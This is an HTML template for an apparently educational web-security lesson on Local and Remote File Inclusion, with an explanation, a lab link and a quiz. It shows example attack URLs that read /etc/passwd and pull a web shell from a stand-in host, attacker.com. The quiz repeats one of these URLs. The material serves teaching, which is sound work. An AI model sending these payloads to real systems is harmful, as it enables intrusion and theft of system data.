{% extends 'layout.html' %}

{% block content %}
<br><br>
<div class="container-fluid">
	<div class="row">
		<div class="col-md-1">
		</div>

		<div class="col-md-10">
			<div class="tabbable" id="tabs-807289">
				<ul class="nav nav-tabs">
					<li class="nav-item">
						<a class="nav-link active" href="#tab1" data-toggle="tab">Explanation</a>
					</li>
					<li class="nav-item">
						<a class="nav-link" href="#tab3" data-toggle="tab">Practical part</a>
					</li>
					<li class="nav-item">
						<a class="nav-link" href="#tab4" data-toggle="tab">MCQ</a>
					</li>
				</ul>
				<div class="tab-content">
					<div class="tab-pane active" id="tab1">
						<p align="justify">
							<br> <br>
						<h2>
							<center><u>LFI/RFI vulnerability</u></center>
						</h2>
						<br><br>
						<h3>
							<center><u>LFI</u></center>
						</h3>
						<br><br>

						Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server. LFI attacks can expose sensitive information, and in severe cases, they can lead to <a
							href="https://brightsec.com/blog/cross-site-scripting-xss/">cross-site scripting (XSS)</a> and remote code execution. LFI is listed as one of the OWASP Top 10 web application vulnerabilities.
						<br>
						File inclusions are a key to any server-side scripting language and allow the content of files to be used as part of web application code. Here is an example of how LFI can enable attackers to extract sensitive information from a server.
						If the application uses code like this, which includes the name of a file in the URL:
						<br> <br>
						<center><em>https://example-site.com/?module=contact.php</em></center>
						<br>
						An attacker can change the URL to look like this:
						<br> <br>
						<center><em>https://example-site.com/?module=/etc/passwd</em></center>
						</p>
						<br>
						<p align="justify">
							And in the absence of proper filtering, the server will display the sensitive content of the <em>/etc/passwd</em> file.
							<br>
							As LFIs help an attacker trick a web application into either running or exposing files on a web server, a local file inclusion attack can lead to cross-site scripting (XSS) and remote code execution (RFI) vulnerabilities.
							<br><br>
							Now we can present how a Local File Inclusion work, this application uses a file path as an input, the app treats that input as trusted and safe. A local file can then be injected into the included statement. This happens when your code
							is vulnerable. In this case, a hacker makes a request that fools the app into executing a malicious PHP script (web shell for example).
							<br><br>
							In some cases, if the application provides the ability to upload files, attackers can run any server-side malicious code they want. Most applications do not provide this capability, and even if they do, the attacker cannot guarantee
							that the app saves the file on the server where the LFI vulnerability is located. The attacker will also need to know the file path to their uploaded file on the server file system.
							<br><br>
							The impact of a Local File Inclusion attack can vary based on the exploitation and the read permissions of the webserver user. Based on these factors, an attacker can gather usernames via an <em>/etc/passwd</em> file, harvest useful
							information from log files, or combine this vulnerability with other attack vectors (such as file upload vulnerability) to execute commands remotely.
							<br><br>
							Those are some example of the LFI vulnerability use:
							<br><br><br>
							<b>1. Information disclosure</b>
							<br><br>
							Although not the worst outcome of a local file inclusion vulnerability, information disclosure can reveal important information about the application and its configuration. That information can be valuable to an attacker to gain a
							deeper understanding of the application and can help them detect and exploit other vulnerabilities.
							<br><br><br>
							<b>2. Directory Traversal</b>
							<br><br>
							A local file inclusion vulnerability can lead to Directory Traversal attacks, where an attacker will try to find and access files on the web server to gain more useful information, such as log files. Log files can reveal the structure
							of the application or expose paths to sensitive files.
							An incorrectly configured server can give attackers access to user config files, giving them access to other files on your server, or even gain administrator access.
							<br><br><br>
							<b>3. Remote Code Execution</b>
							<br><br>
							Combined with a file upload vulnerability, a Local File vulnerability can lead to remote code execution. In this case the attacker would use LFI to execute the unwanted file.
							<br><br><br>
						<h2>
							<center><u>RFI</u></center>
						</h2>
						<br><br>
						For RFI, it’s not that different. A remote file inclusion occurs when a file from a remote server is inserted into a web page. This can be done on purpose to display content on a website from a remote website. But, it can also happen by
						accident, due to a misconfiguration of the respective programming language or during an attack.
						<br><br>
						Even though this kind of inclusion can occur in almost every kind of web application, those written in PHP are more likely to be vulnerable to Remote File Inclusion attacks, because PHP provides native functions that allow the inclusion
						of remote files. Other languages usually require a workaround to imitate this behavior.
						<br><br>
						In order to include a remote file, you have to add a string with the URL of the file to an Include function of the respective language (for example, PHP). Then the web server of the website under attack makes a request to the remote file,
						fetches its contents, and includes it on the web page serving the content. It is then processed by the parser of the language.
						<br><br>
						Consider a developer who wants to include a local file depending on the GET parameter page. They have different files such as <em>contact.php</em>, <em>main.php</em>, and <em>about.php</em>, all of which provide different functionality to
						the website.
						<br><br>
						Each file can be called using the following request:
						<br><br>
						<center><em>https://example.com/index.php?page=contact.php</center></em>
						<br><br>
						While the developer expects that only files inside that folder are included, it might be possible for an attacker to include files from another directory (LFI) or even from a completely different web server (RFI). In fact, without a
						whitelist (of permitted files), the attacker is able to change the filepath to the programming language's Include function. The attacker can include a local file, but in a typical attack, they change the path to a file that resides on a
						server they control. That way, the attacker can easily write malicious code inside a file, without having to poison logs or otherwise inject code inside the web server (which is what is required in the case of an LFI).
						<br><br>
						An attack might look like this:
						<br><br>
						<center><em>https://example.com/index.php?page=https://attacker.com/uploads/webshell.txt</center></em>
						<br><br>
						You will be able to understand how does work the RFI vulnerability thanks to this illustration:
						<br><br>
						<center><img src="static/assets/img/Explanation_RFI.png"></img></center>
						<br><br>
						<a class="btn btn-success" style="float: right;" href="/avancementLFI_RFI">I finished the course</a>
						<br><br><br><br>
						</p>
					</div>
					<div class="tab-pane" id="tab3">
						<br><br>
						<center>
							<p align="justify">
								In this part you will be able to practice on vulnerabilities via a virtual machine:
							</p>
    						<a class="btn btn-success" href="https://10.10.115.7:8080/" target="_blank" rel="noopener noreferrer">Launch VM n°1</a>
							<a class="btn btn-success" href="/downloadLFI_RFI" target="_blank" rel="noopener noreferrer"> Download PDF </a>
						</center>
					</div>
					<div class="tab-pane" id="tab4">
						<br><br>
						Pour valider cet enseignement veuillez répondre au questionnaire suivant :
						<br><br>
						<center>
						<form action="/LFI_RFI_results" class="form-example" method="POST">
							<div class="form-example">
								<label for="name">1)	What does LFI means ?  </label>
								<br>
								<input type="checkbox" name="1-1">
								<label>a. Local File Inclusion</label>
								<br>
								<input type="checkbox" name="1-2">
								<label>b. Local Folder Institution</label>
								<br>
								<input type="checkbox" name="1-3">
								<label>c. Localization of Files Institution</label>
								<br><br><br>

								<label for="name">2)	What are the different use of the LFI vulnerability ?  </label>
								<br>
								<input type="checkbox" name="2-1"  >
								<label>a. Data steal/ Information Disclosure/ Ransomware attacks</label>
								<br>
								<input type="checkbox" name="2-2"  >
								<label>b. Information disclosure/ Directory Traversal/ Remote Code Execution</label>
								<br>
								<input type="checkbox" name="2-3"  >
								<label">c. Directory Traversal/ Data steal/ Encrypting data</label>
								<br><br><br>

								<label for="name">3)	What is the LFI/RFI attack ?</label>
								<br>
								<input type="checkbox" name="3-1"  >
								<label>a.	It allows the attacker to include a file from a remote server</label>
								<br>
								<input type="checkbox" name="3-2" >
								<label>b.	It allows the attacker to listen the communication between 2 persons</label>
								<br>
								<input type="checkbox" name="3-3" >
								<label">c.	It allows the attacker to take the control of the victim’s PC</label>
								<br><br><br>

								<label for="name">4)	How do you include a remote file ?  </label>
								<br>
								<input type="checkbox" name="4-1"  >
								<label>a.	You add a string with the URL of the file to an Include function of the respective language </label>
								<br>
								<input type="checkbox" name="4-2"  >
								<label>b.	You go in the PC file and just create a new file</label>
								<br>
								<input type="checkbox" name="4-3"  >
								<label">c. You go on a website and add the path to the file in the URL</label>
								<br><br><br>

								<label for="name">5)	How does the URL look if an attacker want to have the password of the victim with the LFI attack ?  </label>
								<br>
								<input type="checkbox" name="5-1"  >
								<label>a.	<em>https://example-site.com/?module=contact.php</em></label>
								<br>
								<input type="checkbox" name="5-2"  >
								<label>b.	<em>https://example-site.com/?module=/etc/passwd</em></label>
								<br>
								<input type="checkbox" name="5-3"  >
								<label">c.	<em>https://example-site.com/?module=/etc/network/interfaces</em></label>
							</div>
							<br><br>
							<div class="form-example">
								<input type="submit" value="Submit">
							</div>
							<br><br><br>
							</center>
						</form>
					</div>
				</div>
			</div>
		</div>
		<div class="col-md-1">
		</div>
	</div>
</div>

{% endblock %}
